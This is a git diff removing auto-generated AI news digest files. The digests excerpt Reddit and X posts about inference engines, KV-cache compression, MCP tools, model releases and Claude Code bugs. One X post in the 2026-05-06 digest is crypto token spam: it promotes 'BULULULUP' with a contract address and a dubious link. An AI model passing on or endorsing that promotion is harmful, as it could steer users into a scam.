[P]](https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/) -*Reddit r/MachineLearning* | 03/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool, tool_update - -> I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — "Video Codecs are Secretly Tensor Codecs"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The "video codec on tensors" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\~4× compression floor, basically the Gaussian-noise limit). The PCA basis… - ---- - -## [Released a TurboQuant-compatible KV backend evaluation SDK](https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/) -*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. 
The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \- compressed KV block registration \- KV dot / QK partial execution \- block-local attention partial decode \- capability probing \- fallback and correctness reporting \- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\_compat\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration. - ---- - -## [Node.js v26.0.0 released (MAJOR UPDATE)](https://github.com/nodejs/node/releases/tag/v26.0.0) -*GitHub Releases · Node.js* | 05/05/2026 | Score: 1.00 -Tags: api_update, github_release, cli_tool - -> We're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default, updates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals as we continue to modernize the platform. As a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the "Current" release for the next six months. We encourage you to explore the new features and benefits offered by this latest release a - ---- - -## [Anthropic ships Claude for Creative Work with nine MCP-native connectors](https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: mcp, developer_tool, tool_update - -> Anthropic announced Claude for Creative Work on April 28. 
The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work) - ---- - -## [Offload routine Claude Code work to Gemma 4 through the Google GenAI API](https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. 
The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp) - ---- - -## [Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]](https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/) -*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming. - ---- - -## [Gemini has a big outage going on but refuses to acknowledge on official status page! How do you know if an LLM API is actually down vs just you?](https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Genuine question. Gemini had a 5+ hour outage this morning. 
I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider="google", model="gemini-2.5-flash", error_code=503, error_type="overloaded") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \ -H "Content-Type: application/json" \ -d '{"provider":"google","model":"gemini-2.5-fla… - ---- - -## [SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for](https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/) -*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. 
The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope… - ---- - -## [Local Dream 2.4.3 - SDXL support, tag autocomplete and more](https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/) -*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \- Tag autocomplete from CSV import \- Token counter for prompts \- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases) - ---- - -## [Building a 9-ball AI player: Candidate generation for direct cut shots [P]](https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/) -*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. 
Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la… - ---- - -## [Parax v0.5: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/) -*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for "parametric modeling" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. 
Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary - ---- - -## [AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]](https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/) -*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. 
The honest caveat from the author: this uses four reference projects and… - ---- - -## ["FLUX Creator Program" - New Flux models sooner than expected?](https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post - ---- - -## [Best Open Source models for running on Gaming PC or Mac mini M4](https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/) -*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 -Tags: open_source - -> I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you! - ---- - -## [OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…](https://x.com/H_Mhatre_/status/2051715305890521578) -*X / @h_mhatre_* | 05/05/2026 | Score: 1.00 -Tags: tool_update - -> OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. 
$MSFT - ---- - diff --git a/data/digest-2026-05-06.md b/data/digest-2026-05-06.md deleted file mode 100644 index c561332..0000000 --- a/data/digest-2026-05-06.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-06** | 15 stories | Auto-generated from 542 archived stories - ---- - -## [[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)](https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\_KVEdit\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. 
You will al… - ---- - -## [OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI](https://x.com/Reeperr131/status/2052074977973694608) -*X search / Agent workflows* | 06/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, tool_update - -> OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI - ---- - -## [CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI](https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. 
Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit) - ---- - -## [2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints](https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: api_update, product_launch, agent_tool - -> > **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. 
You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo… - ---- - -## [Getting error "command 'claude-vscode.editor.openLast' not found", but not like anyone has talked about.](https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - -> I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error "Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. 
Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\Users\___\.vscode\extensions\anthropic.claude-code-2.1.129-win32-x64\extension.js:102:… - ---- - -## [UniReasoner: Using LLMs as "Universal Reasoners" to Fix Prompt Alignment](https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the "understanding-generation gap" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's "understanding" capacity is much stronger than its "generative" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. 
It produces a "grounded evaluation" in text, pinpointing exactly what is wrong (e.g., "Missing a bicyc… - ---- - -## [Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself](https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!** - ---- - -## [Internal tools wIth no MCP](https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP. 
- ---- - -## [Show HN: Adam – An embeddable cross-platform AI agent library](https://github.com/sqliteai/adam) -*Hacker News* | 06/05/2026 | Score: 0.96 -Tags: developer_tool, agent_tool - ---- - -## [The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)](https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked "cool, where's the code?" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \~87 tok/s Nemotron-3 Nano 30B (FP8): \~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco… - ---- - -## [Anyone else tried this RefineAnything LoRA? 
Pretty impressed so far](https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: developer_tool - -> Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I… - ---- - -## [I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4](https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. 
# Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my… - ---- - -## [the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one pai…](https://x.com/NovaByArun/status/2052077319960047791) -*X search / AI vibes* | 06/05/2026 | Score: 1.00 -Tags: tool_update - -> the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one painful workflow. one credible audience. - ---- - -## [Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! 
Check https:// OKAI.HK/ALpha](https://x.com/AzaleasWatkin/status/2052075760354238868) -*X search / Agent workflows* | 06/05/2026 | Score: 1.00 -Tags: mcp - -> Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha - ---- - -## [I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?](https://x.com/MichaelAzmy/status/2052075579424334002) -*X search / AI model updates* | 06/05/2026 | Score: 1.00 -Tags: product_launch - -> I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic? - ---- - diff --git a/data/digest-2026-05-07.md b/data/digest-2026-05-07.md deleted file mode 100644 index 000df5c..0000000 --- a/data/digest-2026-05-07.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-07** | 15 stories | Auto-generated from 548 archived stories - ---- - -## [I embedded an AI agent in my shell. It can now run interactive programs.](https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: product_launch, open_source, developer_tool, cli_tool, agent_tool - -> I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. 
I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te… - ---- - -## [I just tried Reactor's open source world model demo, here are my thoughts](https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/) -*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think! - ---- - -## [My Claude dreams at night and remembers everything. Better than mempalace.](https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: mcp, open_source, tool_update - -> Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. 
So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No "remember this." No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months… - ---- - -## [Claude Code: the only CLI where scrolling up is a premium feature](https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo "hello world" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The "workarounds": \- Ctrl+O transcript mode — congrats, you can now read your conversation history, but 